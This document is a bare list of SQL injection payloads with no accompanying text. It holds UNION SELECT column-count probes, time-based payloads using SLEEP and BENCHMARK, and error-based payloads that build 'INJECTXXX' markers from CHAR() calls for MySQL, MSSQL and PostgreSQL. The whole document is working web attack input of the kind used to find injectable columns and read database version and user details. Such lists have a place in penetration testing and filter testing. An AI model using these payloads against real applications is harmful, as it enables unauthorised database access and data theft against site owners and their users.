UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15–

UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16–

UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17–

UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18–

UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19–

UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20–

UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21–

UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22–

UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23–

UNION ALL SELECT

1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24–

UNION ALL SELECT

1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25–

UNION ALL SELECT

1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26–

UNION ALL SELECT

1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27–

UNION ALL SELECT

1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28–

UNION ALL SELECT

1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29–

UNION ALL SELECT

1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30–
UNION SELECT @@VERSION,SLEEP(5),3

UNION SELECT @@VERSION,SLEEP(5),USER(),4

UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5(‘A’)),5

UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5(‘A’)),5,6

UNION SELECT
@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5(‘A’)),5,6,7

UNION SELECT
@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5(‘A’)),5,6,7,8

UNION SELECT
@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5(‘A’)),5,6,7,8,9

UNION SELECT
@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5(‘A’)),5,6,7,8,9,10

UNION SELECT
@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5(‘A’)),5,6,7,8,9,10,11

UNION SELECT
@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5(‘A’)),5,6,7,8,9,10,11,12

UNION SELECT
@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5(‘A’)),5,6,7,8,9,10,11,12
,13

UNION SELECT
@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5(‘A’)),5,6,7,8,9,10,11,12
,13,14

UNION SELECT
@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5(‘A’)),5,6,7,8,9,10,11,12
,13,14,15

UNION SELECT
@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5(‘A’)),5,6,7,8,9,10,11,12
,13,14,15,16

UNION SELECT
@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5(‘A’)),5,6,7,8,9,10,11,12
,13,14,15,16,17

UNION SELECT
@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5(‘A’)),5,6,7,8,9,10,11,12
,13,14,15,16,17,18

UNION SELECT
@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5(‘A’)),5,6,7,8,9,10,11,12
,13,14,15,16,17,18,19

UNION SELECT
@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5(‘A’)),5,6,7,8,9,10,11,12
,13,14,15,16,17,18,19,20

UNION SELECT
@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5(‘A’)),5,6,7,8,9,10,11,12
,13,14,15,16,17,18,19,20,21

UNION SELECT
@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5(‘A’)),5,6,7,8,9,10,11,12
,13,14,15,16,17,18,19,20,21,22

UNION SELECT
@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5(‘A’)),5,6,7,8,9,10,11,12
,13,14,15,16,17,18,19,20,21,22,23

UNION SELECT
@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5(‘A’)),5,6,7,8,9,10,11,12
,13,14,15,16,17,18,19,20,21,22,23,24

UNION SELECT
@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5(‘A’)),5,6,7,8,9,10,11,12
,13,14,15,16,17,18,19,20,21,22,23,24,25
UNION SELECT
@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5(‘A’)),5,6,7,8,9,10,11,12
,13,14,15,16,17,18,19,20,21,22,23,24,25,26

UNION SELECT
@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5(‘A’)),5,6,7,8,9,10,11,12
,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27

UNION SELECT
@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5(‘A’)),5,6,7,8,9,10,11,12
,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28

UNION SELECT
@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5(‘A’)),5,6,7,8,9,10,11,12
,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29

UNION SELECT
@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5(‘A’)),5,6,7,8,9,10,11,12
,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30

UNION SELECT @@VERSION,SLEEP(5),”‘3

UNION SELECT @@VERSION,SLEEP(5),”‘3′”#

UNION SELECT @@VERSION,SLEEP(5),USER(),4#

UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5(‘A’)),5#

UNION SELECT
@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5(‘A’)),5,6#

UNION SELECT
@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5(‘A’)),5,6,7#

UNION SELECT
@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5(‘A’)),5,6,7,8#

UNION SELECT
@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5(‘A’)),5,6,7,8,9#
UNION SELECT
@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5(‘A’)),5,6,7,8,9,10#

UNION SELECT
@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5(‘A’)),5,6,7,8,9,10,11#

UNION SELECT
@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5(‘A’)),5,6,7,8,9,10,11,12
#

UNION SELECT
@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5(‘A’)),5,6,7,8,9,10,11,12
,13#

UNION SELECT
@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5(‘A’)),5,6,7,8,9,10,11,12
,13,14#

UNION SELECT
@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5(‘A’)),5,6,7,8,9,10,11,12
,13,14,15#

UNION SELECT
@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5(‘A’)),5,6,7,8,9,10,11,12
,13,14,15,16#

UNION SELECT
@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5(‘A’)),5,6,7,8,9,10,11,12
,13,14,15,16,17#

UNION SELECT
@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5(‘A’)),5,6,7,8,9,10,11,12
,13,14,15,16,17,18#

UNION SELECT
@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5(‘A’)),5,6,7,8,9,10,11,12
,13,14,15,16,17,18,19#
UNION SELECT
@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5(‘A’)),5,6,7,8,9,10,11,12
,13,14,15,16,17,18,19,20#

UNION SELECT
@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5(‘A’)),5,6,7,8,9,10,11,12
,13,14,15,16,17,18,19,20,21#

UNION SELECT
@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5(‘A’)),5,6,7,8,9,10,11,12
,13,14,15,16,17,18,19,20,21,22#

UNION SELECT
@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5(‘A’)),5,6,7,8,9,10,11,12
,13,14,15,16,17,18,19,20,21,22,23#

UNION SELECT
@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5(‘A’)),5,6,7,8,9,10,11,12
,13,14,15,16,17,18,19,20,21,22,23,24#

UNION SELECT
@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5(‘A’)),5,6,7,8,9,10,11,12
,13,14,15,16,17,18,19,20,21,22,23,24,25#

UNION SELECT
@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5(‘A’)),5,6,7,8,9,10,11,12
,13,14,15,16,17,18,19,20,21,22,23,24,25,26#

UNION SELECT
@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5(‘A’)),5,6,7,8,9,10,11,12
,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27#

UNION SELECT
@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5(‘A’)),5,6,7,8,9,10,11,12
,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28#

UNION SELECT
@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5(‘A’)),5,6,7,8,9,10,11,12
,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29#

UNION SELECT
@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5(‘A’)),5,6,7,8,9,10,11,12
,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30#

UNION ALL SELECT USER()–

UNION ALL SELECT SLEEP(5)–

UNION ALL SELECT USER(),SLEEP(5)–

UNION ALL SELECT @@VERSION,USER(),SLEEP(5)–

UNION ALL SELECT

@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5(‘A’))–

UNION ALL SELECT

@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5(‘A’)),NULL–

UNION ALL SELECT

@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5(‘A’)),NULL,NULL–

UNION ALL SELECT

@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5(‘A’)),NULL,NULL,NULL–

UNION ALL SELECT

@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5(‘A’)),NULL,NULL,NULL,
NULL–

UNION ALL SELECT

@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5(‘A’)),NULL,NULL,NULL,
NULL,NULL–

UNION ALL SELECT

@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5(‘A’)),NULL,NULL,NULL,
NULL,NULL,NULL–

UNION ALL SELECT

@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5(‘A’)),NULL,NULL,NULL,
NULL,NULL,NULL,NULL–

UNION ALL SELECT

@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5(‘A’)),NULL,NULL,NULL,
NULL,NULL,NULL,NULL,NULL–

UNION ALL SELECT

@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5(‘A’)),NULL,NULL,NULL,
NULL,NULL,NULL,NULL,NULL,NULL–

UNION ALL SELECT

@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5(‘A’)),NULL,NULL,NULL,
NULL,NULL,NULL,NULL,NULL,NULL,NULL–

UNION ALL SELECT

@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5(‘A’)),NULL,NULL,NULL,
NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL–

UNION ALL SELECT

@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5(‘A’)),NULL,NULL,NULL,
NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL–

UNION ALL SELECT

@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5(‘A’)),NULL,NULL,NULL,
NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL–

UNION ALL SELECT

@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5(‘A’)),NULL,NULL,NULL,
NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL–

UNION ALL SELECT

@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5(‘A’)),NULL,NULL,NULL,
NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL–

UNION ALL SELECT

@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5(‘A’)),NULL,NULL,NULL,
NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL–
UNION ALL SELECT
@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5(‘A’)),NULL,NULL,NULL,
NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL–

UNION ALL SELECT

@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5(‘A’)),NULL,NULL,NULL,
NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,
NULL–

UNION ALL SELECT

@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5(‘A’)),NULL,NULL,NULL,
NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,
NULL,NULL–

UNION ALL SELECT

@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5(‘A’)),NULL,NULL,NULL,
NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,
NULL,NULL,NULL–

UNION ALL SELECT

@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5(‘A’)),NULL,NULL,NULL,
NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,
NULL,NULL,NULL,NULL–

UNION ALL SELECT

@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5(‘A’)),NULL,NULL,NULL,
NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,
NULL,NULL,NULL,NULL,NULL–

UNION ALL SELECT

@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5(‘A’)),NULL,NULL,NULL,
NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,
NULL,NULL,NULL,NULL,NULL,NULL–

UNION ALL SELECT

@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5(‘A’)),NULL,NULL,NULL,
NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,
NULL,NULL,NULL,NULL,NULL,NULL,NULL–

UNION ALL SELECT

@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5(‘A’)),NULL,NULL,NULL,
NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,
NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL–

UNION ALL SELECT NULL–

AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)))–

AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)))–

AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)))–

AND 5650=CONVERT(INT,(UNION ALL

SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))–

AND 5650=CONVERT(INT,(UNION ALL

SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))–

AND 5650=CONVERT(INT,(UNION ALL

SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))–

AND 5650=CONVERT(INT,(UNION ALL

SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88))
)–

AND 5650=CONVERT(INT,(UNION ALL

SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)
+CHAR(118)))–

AND 5650=CONVERT(INT,(UNION ALL

SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)
+CHAR(118)+CHAR(120)))–

AND 5650=CONVERT(INT,(UNION ALL

SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)
+CHAR(118)+CHAR(120)+CHAR(80)))–
AND 5650=CONVERT(INT,(UNION ALL
SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)
+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)))–

AND 5650=CONVERT(INT,(UNION ALL

SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)
+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)))–

AND 5650=CONVERT(INT,(UNION ALL

SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)
+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)))–

AND 5650=CONVERT(INT,(UNION ALL

SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)
+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)))–

AND 5650=CONVERT(INT,(UNION ALL

SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)
+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+C
HAR(113)))–

AND 5650=CONVERT(INT,(UNION ALL

SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)
+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+C
HAR(113)+CHAR(112)))–

AND 5650=CONVERT(INT,(UNION ALL

SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)
+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+C
HAR(113)+CHAR(112)+CHAR(106)))–

AND 5650=CONVERT(INT,(UNION ALL

SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)
+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+C
HAR(113)+CHAR(112)+CHAR(106)+CHAR(107)))–

AND 5650=CONVERT(INT,(UNION ALL

SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)
+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+C
HAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113)))–

UNION ALL SELECT NULL#

AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)))#

AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)))#

AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)))#

AND 5650=CONVERT(INT,(UNION ALL

SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))#

AND 5650=CONVERT(INT,(UNION ALL

SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))#

AND 5650=CONVERT(INT,(UNION ALL

SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))#

AND 5650=CONVERT(INT,(UNION ALL

SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88))
)#

AND 5650=CONVERT(INT,(UNION ALL

SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)
+CHAR(118)))#

AND 5650=CONVERT(INT,(UNION ALL

SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)
+CHAR(118)+CHAR(120)))#

AND 5650=CONVERT(INT,(UNION ALL

SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)
+CHAR(118)+CHAR(120)+CHAR(80)))#

AND 5650=CONVERT(INT,(UNION ALL

SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)
+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)))#

AND 5650=CONVERT(INT,(UNION ALL

SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)
+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)))#

AND 5650=CONVERT(INT,(UNION ALL

SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)
+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)))#

AND 5650=CONVERT(INT,(UNION ALL

SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)
+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)))#

AND 5650=CONVERT(INT,(UNION ALL

SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)
+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+C
HAR(113)))#

AND 5650=CONVERT(INT,(UNION ALL

SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)
+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+C
HAR(113)+CHAR(112)))#

AND 5650=CONVERT(INT,(UNION ALL

SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)
+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+C
HAR(113)+CHAR(112)+CHAR(106)))#

AND 5650=CONVERT(INT,(UNION ALL

SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)
+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+C
HAR(113)+CHAR(112)+CHAR(106)+CHAR(107)))#

AND 5650=CONVERT(INT,(UNION ALL

SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)
+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+C
HAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113)))#

UNION ALL SELECT NULL

AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)))

AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)))

AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)))

AND 5650=CONVERT(INT,(UNION ALL

SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))

AND 5650=CONVERT(INT,(UNION ALL

SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))

AND 5650=CONVERT(INT,(UNION ALL

SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))

AND 5650=CONVERT(INT,(UNION ALL

SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88))
)

AND 5650=CONVERT(INT,(UNION ALL

SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)
+CHAR(118)))

AND 5650=CONVERT(INT,(UNION ALL

SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)
+CHAR(118)+CHAR(120)))

AND 5650=CONVERT(INT,(UNION ALL

SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)
+CHAR(118)+CHAR(120)+CHAR(80)))

AND 5650=CONVERT(INT,(UNION ALL

SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)
+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)))

AND 5650=CONVERT(INT,(UNION ALL

SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)
+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)))

AND 5650=CONVERT(INT,(UNION ALL

SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)
+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)))

AND 5650=CONVERT(INT,(UNION ALL

SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)
+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)))

AND 5650=CONVERT(INT,(UNION ALL

SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)
+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+C
HAR(113)))

AND 5650=CONVERT(INT,(UNION ALL

SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)
+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+C
HAR(113)+CHAR(112)))

AND 5650=CONVERT(INT,(UNION ALL

SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)
+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+C
HAR(113)+CHAR(112)+CHAR(106)))

AND 5650=CONVERT(INT,(UNION ALL

SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)
+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+C
HAR(113)+CHAR(112)+CHAR(106)+CHAR(107)))

AND 5650=CONVERT(INT,(UNION ALL

SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)
+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+C
HAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113)))

AND 5650=CONVERT(INT,(SELECT
CHAR(113)+CHAR(106)+CHAR(122)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN
(5650=5650) THEN CHAR(49) ELSE CHAR(48)
END))+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113)))

AND
3516=CAST((CHR(113)||CHR(106)||CHR(122)||CHR(106)||CHR(113))||(SELECT
(CASE WHEN (3516=3516) THEN 1 ELSE 0
END))::text||(CHR(113)||CHR(112)||CHR(106)||CHR(107)||CHR(113)) AS
NUMERIC)

AND (SELECT 4523 FROM(SELECT COUNT(*),CONCAT(0x716a7a6a71,(SELECT

(ELT(4523=4523,1))),0x71706a6b71,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

UNION ALL SELECT

CHAR(113)+CHAR(106)+CHAR(122)+CHAR(106)+CHAR(113)+CHAR(110)+CHAR(106
)+CHAR(99)+CHAR(73)+CHAR(66)+CHAR(109)+CHAR(119)+CHAR(81)+CHAR(108)+
CHAR(88)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113),NULL–

UNION ALL SELECT ‘INJ’||’ECT’||’XXX’

UNION ALL SELECT ‘INJ’||’ECT’||’XXX’,2

UNION ALL SELECT ‘INJ’||’ECT’||’XXX’,2,3

UNION ALL SELECT ‘INJ’||’ECT’||’XXX’,2,3,4

UNION ALL SELECT ‘INJ’||’ECT’||’XXX’,2,3,4,5

UNION ALL SELECT ‘INJ’||’ECT’||’XXX’,2,3,4,5,6

UNION ALL SELECT ‘INJ’||’ECT’||’XXX’,2,3,4,5,6,7

